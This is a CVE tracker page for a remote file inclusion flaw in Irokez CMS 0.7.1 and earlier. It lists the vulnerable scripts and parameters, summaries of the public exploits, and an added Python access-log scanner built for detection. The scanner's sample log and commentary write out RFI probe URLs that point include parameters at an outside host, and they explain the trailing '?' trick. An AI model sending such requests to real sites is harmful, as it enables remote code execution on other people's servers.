CVE-2006-6771

Irokez CMS <= 0.7.1 - Remote File Inclusion via Multiple PHP Script Parameters

Title source: llm

Exploitation Summary

EIP tracks 2 public exploits for CVE-2006-6771. PoCs published by Corwin and nuffsaid.

AI-analyzed exploit summary: the writeup at exploit-db 32823 describes multiple vulnerabilities in Irokez Blog 0.7.3.2, including XSS, SQL injection, and remote file inclusion, with example payloads but no executable code. Note that 0.7.3.2 lies outside the affected range given in the description (0.7.1 and earlier); the working PoC for the register_globals-dependent include paths of this CVE is exploit-db 3007.

Description

Multiple PHP remote file inclusion vulnerabilities in Irokez CMS 0.7.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in:

(1) the GLOBALS[PTH][func] parameter in (a) scripts/gallery.scr.php;
(2) the GLOBALS[PTH][spaw] parameter in (b) scripts/xtextarea.scr.php; and
(3) the GLOBALS[PTH][classes] parameter in (c) sitemap.scr.php, (d) news.scr.php, (e) polls.scr.php, (f) rss.scr.php, and (g) search.scr.php in scripts/, and (h) form.fun.php, (i) general.func.php, (j) groups.func.php, (k) js.func.php, (l) sections.func.php, and (m) users.func.php in functions/.
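The include paths above are reached purely through query-string parameters, so attempts leave a distinctive trace in web server access logs. The following Python script is an added example, not part of this page or of any published PoC: it parses Apache combined-format log lines, decodes the query string, and flags requests that set a GLOBALS[PTH][...] parameter to a URL or stream wrapper, cross-checking the requested script against the per-script parameter table taken from the CVE description. The log lines and IP addresses are constructed for the example.

```python
"""Added example: flag RFI probes against the CVE-2006-6771 parameters in
Apache combined-format access logs. The log lines below are constructed;
the script/parameter table comes from the CVE description."""
import re
from urllib.parse import urlsplit, parse_qsl

# Affected script -> GLOBALS[PTH][<key>] parameter named in the CVE description.
AFFECTED = {
    "scripts/gallery.scr.php": "func",
    "scripts/xtextarea.scr.php": "spaw",
    "scripts/sitemap.scr.php": "classes",
    "scripts/news.scr.php": "classes",
    "scripts/polls.scr.php": "classes",
    "scripts/rss.scr.php": "classes",
    "scripts/search.scr.php": "classes",
    "functions/form.fun.php": "classes",
    "functions/general.func.php": "classes",
    "functions/groups.func.php": "classes",
    "functions/js.func.php": "classes",
    "functions/sections.func.php": "classes",
    "functions/users.func.php": "classes",
}

# Values that make include()/require() fetch or synthesise code instead of
# reading a local file (when the PHP configuration permits URL includes).
REMOTE_VALUE = re.compile(r"^(https?|ftp)://|^(php|data|expect)://", re.I)
PTH_PARAM = re.compile(r"^GLOBALS\[PTH\]\[(\w+)\]$", re.I)

# Apache combined log prefix: client, ident, user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


def probe_parameters(query):
    """Return (key, value) for every GLOBALS[PTH][key]=<remote> pair in the query string."""
    hits = []
    # parse_qsl percent-decodes names and values, so %5B/%5D encodings are handled.
    for name, value in parse_qsl(query, keep_blank_values=True):
        m = PTH_PARAM.match(name)
        if m and REMOTE_VALUE.match(value):
            hits.append((m.group(1).lower(), value))
    return hits


def classify(line):
    """Return a finding dict for an RFI probe, or None for a benign or unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = probe_parameters(parts.query)
    if not hits:
        return None
    path = parts.path.lstrip("/")
    # Match on the tail of the path so an install under /blog/ still matches.
    script = next((s for s in AFFECTED if path.endswith(s)), None)
    key, value = hits[0]
    return {
        "src": m.group("ip"),
        "status": int(m.group("status")),
        "script": script,
        "key": key,
        "include_url": value,
        # Strongest signal: a known script hit with the exact key the CVE names.
        "known_cve_vector": script is not None and AFFECTED[script] == key,
    }


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in (classify(l) for l in lines) if f]


# Constructed sample log (documentation addresses, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Dec/2006:10:15:02 +0000] "GET /scripts/news.scr.php?GLOBALS[PTH][classes]=http://198.51.100.7/c.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [27/Dec/2006:10:15:03 +0000] "GET /blog/scripts/gallery.scr.php?GLOBALS%5BPTH%5D%5Bfunc%5D=http%3A%2F%2F198.51.100.7%2Fc.txt%3F HTTP/1.0" 200 488 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [27/Dec/2006:10:16:40 +0000] "GET /scripts/news.scr.php?id=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Dec/2006:10:17:11 +0000] "GET /index.php?GLOBALS[PTH][classes]=http://198.51.100.7/c.txt? HTTP/1.0" 404 210 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The trailing `?` on the included URL is the classic RFI idiom: it turns whatever the vulnerable script appends to the path into a query string on the attacker's server, so the fetch still resolves. A hit on an unknown script (the index.php line) is kept as a lower-confidence finding rather than dropped, since the same parameter is also the vector for scripts the description does not list.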

Exploits (2)

exploitdb WRITEUP VERIFIED
by Corwin · text · webapps · php
https://www.exploit-db.com/exploits/32823

The provided text describes multiple vulnerabilities in Irokez Blog 0.7.3.2, including XSS, SQL injection, and remote file inclusion. It includes example payloads for exploitation but lacks executable code.

Classification
Writeup 90%
Attack Type
Sqli | Xss | Other
Complexity
Trivial
Reliability
Theoretical
Target: Irokez Blog 0.7.3.2
No auth needed
Prerequisites: Access to vulnerable Irokez Blog instance
devstral-2 · analyzed Feb 16, 2026
exploitdb WORKING POC VERIFIED
by nuffsaid · text · webapps · php
https://www.exploit-db.com/exploits/3007

This exploit demonstrates multiple remote file inclusion vulnerabilities in Irokez CMS <= 0.7.1: the path variables used to build include() arguments are never initialized, so with register_globals enabled a request can set them through the query string. The PoC provides URLs that point those path variables at an attacker-hosted PHP file.

Classification
Working Poc 100%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: Irokez CMS <= 0.7.1
No auth needed
Prerequisites: register_globals = on · URL includes permitted by the PHP configuration (allow_url_fopen; on PHP 5.2 and later also allow_url_include) · a PHP build that still lets register_globals overwrite $GLOBALS (PHP 4.4.1 and 5.0.5 blocked this, so the GLOBALS[PTH] vector needs an older interpreter)
devstral-2 · analyzed Feb 16, 2026

References (4)

Core References
Exploit vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/21769
Third Party Advisory vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2006/5178
Exploit, Third Party Advisory exploit x_refsource_exploit-db
https://www.exploit-db.com/exploits/3007
Exploit, Vendor Advisory third-party-advisory x_refsource_secunia
http://secunia.com/advisories/23497

Scores

EPSS 0.0215
EPSS Percentile 79.7%

Details

Status published
Products (1)
irokez/irokez_cms <= 0.7.1
Published Dec 27, 2006
Tracked Since Feb 18, 2026